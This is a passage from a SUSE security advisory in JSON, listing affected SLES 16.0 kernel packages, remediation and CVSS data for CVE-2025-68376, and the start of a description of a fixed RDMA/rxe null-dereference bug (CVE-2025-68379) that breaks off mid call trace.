"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68376",
"url": "https://www.suse.com/security/cve/CVE-2025-68376"
},
{
"category": "external",
"summary": "SUSE Bug 1255529 for CVE-2025-68376",
"url": "https://bugzilla.suse.com/1255529"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68376"
},
{
"cve": "CVE-2025-68379",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68379"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/rxe: Fix null deref on srq-\u003erq.queue after resize failure\n\nA NULL pointer dereference can occur in rxe_srq_chk_attr() when\nibv_modify_srq() is invoked twice in succession under certain error\nconditions. The first call may fail in rxe_queue_resize(), which leads\nrxe_srq_from_attr() to set srq-\u003erq.queue = NULL. The second call then\ntriggers a crash (null deref) when accessing\nsrq-\u003erq.queue-\u003ebuf-\u003eindex_mask.\n\nCall Trace:\n\u003cTASK\u003e\nrxe_modify_srq+0x170/0x480 [rdma_rxe]\n? __pfx_rxe_modify_srq+0x10/0x10 [rdma_rxe]\n? uverbs_try_lock_object+0x4f/0xa0 [ib_uverbs]\n? rdma_lookup_get_uobject+0x1f0/0x380 [ib_uverbs]\nib_uverbs_modify_srq+0x204/0x290 [ib_uverbs]\n? __pfx_ib_uverbs_modify_srq+0x10/0x10 [ib_uverbs]\n? tryinc_node_nr_active+0xe6/0x150\n? 